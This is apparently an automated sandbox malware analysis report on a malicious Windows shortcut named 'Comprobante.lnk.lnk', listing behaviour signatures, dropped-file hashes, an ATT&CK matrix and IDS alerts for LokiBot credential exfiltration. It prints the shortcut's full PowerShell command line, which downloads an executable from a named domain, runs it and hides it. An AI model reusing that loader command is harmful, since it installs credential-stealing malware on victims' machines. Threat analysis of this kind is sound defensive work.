Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 6_2_0040317B |
Source: | Code function: | 6_2_00402B7C |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | File source: | ||
Source: | File source: |
Source: | Process created: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Code function: | 6_2_0040D069 | |
Source: | Code function: | 6_2_0040D069 |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 3 PowerShell | 1 DLL Side-Loading | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 2 Credentials in Registry | 13 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 11 Process Discovery | Distributed Component Object Model | Input Capture | 215 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
freighteighttwocam.ddns.net | 45.149.241.169 | true | true | unknown | |
www.sodiumlaurethsulfatedesyroyer.com | 188.114.96.3 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true | unknown | ||
true | unknown | ||
true | unknown | ||
true | unknown | ||
true | unknown | ||
true | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
true | unknown | |||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
true | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
188.114.96.3 | www.sodiumlaurethsulfatedesyroyer.com | European Union | 13335 | CLOUDFLARENETUS | true | |
45.149.241.169 | freighteighttwocam.ddns.net | Germany | 701 | UUNETUS | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1524798 |
Start date and time: | 2024-10-03 09:19:31 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 13 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Comprobante.lnk.lnk |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winLNK@12/10@3/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 4552 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Comprobante.lnk.lnk
Time | Type | Description |
---|---|---|
03:20:39 | API Interceptor | |
03:20:50 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
188.114.96.3 | Get hash | malicious | RHADAMANTHYS | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | WinSearchAbuse | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
freighteighttwocam.ddns.net | Get hash | malicious | AsyncRAT | Browse |
| |
www.sodiumlaurethsulfatedesyroyer.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | XenoRAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | LummaC, Vidar | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
UUNETUS | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Njrat | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Amadey, Credential Flusher, Stealc | Browse |
|
Process: | C:\Users\user\Desktop\mjtjewi.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 706 |
Entropy (8bit): | 5.349842958726647 |
Encrypted: | false |
SSDEEP: | 12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk |
MD5: | 873FA73F7EAAC5A90DC38988855C5032 |
SHA1: | 694CDB950E35FE9EDBAE22377CBB1630F8F1DB84 |
SHA-256: | 501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02 |
SHA-512: | 3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulnmWllZ:NllUmWl |
MD5: | 3EBBEC2F920D055DAC842B4FF84448FA |
SHA1: | 52D2AD86C481FAED6187FC7E6655C5BD646CA663 |
SHA-256: | 32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09 |
SHA-512: | 163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\mjtjewi.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 371712 |
Entropy (8bit): | 7.854168969155107 |
Encrypted: | false |
SSDEEP: | 6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl |
MD5: | DB94D5DF4ADD0A06F261EAE73C2DA5DB |
SHA1: | A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1 |
SHA-256: | 8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70 |
SHA-512: | 8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67 |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\mjtjewi.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\6c132e98e5a06fd825caf0498d9711c3_9e146be9-c76a-4720-bcdb-53011b87bd06
Download File
Process: | C:\Users\user\Desktop\mjtjewi.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 46 |
Entropy (8bit): | 0.9390929552354661 |
Encrypted: | false |
SSDEEP: | 3:/lbORkn:0en |
MD5: | 5613DEA7B6F9C4C154D8E228D35F972D |
SHA1: | E330C16379E078920136F9FF0E43F865B84E7B13 |
SHA-256: | 6472377665EEE67CA32FB8213E50A5577DC617DB5C53B9D35AAC4DA2C7D0DCEE |
SHA-512: | B2DE1CAAE44D8822508F4D00D2824C0749BC8C4D75BBE726D54229F6FDCD218A74EC7B293C5A6069041B5E3133ECF089BA46E763DDD6E448D93F309360E1BE85 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3BDBEQO9NFNA05DW626L.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5353 |
Entropy (8bit): | 3.4068292302060743 |
Encrypted: | false |
SSDEEP: | 48:ethGaCvsOcGAVo13m9/SXplxcc7SogZo/KFG9/SXpl+cc7SogZo/c1:eHG6OzmY2QXpMbHeDQXpjbHeW |
MD5: | B6C0A170557982613E817965D43EDDD8 |
SHA1: | 153ED0A5BF421C6FB3E44A9B40D891A98343D176 |
SHA-256: | D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF |
SHA-512: | D781053E11345E94DA973E2419F2715D11C14A5F759C47F5B48F0EBFAA9CC9E7945D665A96A3913013045BC814532C69B68189C9E93E528FBDB73890CB2DEE60 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7b78f1e09efa3ae5.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5353 |
Entropy (8bit): | 3.4068292302060743 |
Encrypted: | false |
SSDEEP: | 48:ethGaCvsOcGAVo13m9/SXplxcc7SogZo/KFG9/SXpl+cc7SogZo/c1:eHG6OzmY2QXpMbHeDQXpjbHeW |
MD5: | B6C0A170557982613E817965D43EDDD8 |
SHA1: | 153ED0A5BF421C6FB3E44A9B40D891A98343D176 |
SHA-256: | D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF |
SHA-512: | D781053E11345E94DA973E2419F2715D11C14A5F759C47F5B48F0EBFAA9CC9E7945D665A96A3913013045BC814532C69B68189C9E93E528FBDB73890CB2DEE60 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 371712 |
Entropy (8bit): | 7.854168969155107 |
Encrypted: | false |
SSDEEP: | 6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl |
MD5: | DB94D5DF4ADD0A06F261EAE73C2DA5DB |
SHA1: | A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1 |
SHA-256: | 8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70 |
SHA-512: | 8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67 |
Malicious: | true |
Antivirus: |
|
Preview: |
File type: | |
Entropy (8bit): | 2.8522775336366517 |
TrID: |
|
File name: | Comprobante.lnk.lnk |
File size: | 2'538 bytes |
MD5: | b234c46d1f63b18ad2dc3f824bc0d6fa |
SHA1: | fbdcce6b33b9e0ffbba48aadca0db9059af37141 |
SHA256: | 8cd7bd86c1cc1be6d0c553fc3e8e02232b70363fadc3212989b1599a70c668d3 |
SHA512: | 883b59b949966ac9a4b04f51a5298f842b94c80423dec3dd35105c4c61724cde142b7a781a8fab9da32c6748e4d205af7c74f1acd09388f5d19600ac8da97883 |
SSDEEP: | 24:8z/BHYVKVWzO+/CWXHiyQebPE+g1rwpTukQsCXrSZo9ufoYZa4o0oYh5/:8z5a5LE+g1r0qkQL4o96oK |
TLSH: | A55124145BFA0320E6F78B3968BAF741897A7C65FE22CB8D0150918C1C75651E871F3B |
File Content Preview: | L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B..................... |
Icon Hash: | 74f0e4e4e4e1e1ed |
General | |
---|---|
Relative Path: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Command Line Argument: | -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden'; |
Icon location: | c:\windows\system32\perfi009.dat |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:32.181025+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64437 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64368 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64388 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 49717 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64348 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64371 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 49718 | TCP |
2024-10-03T09:20:48.138102+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:48.138102+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:48.138102+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:49.077565+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:49.427132+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:49.427132+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:49.427132+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.285873+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.395968+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.395968+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.395968+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:51.444637+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:51.444637+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:51.445072+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 49713 | TCP |
2024-10-03T09:20:52.138116+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.138116+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.138116+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.895647+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
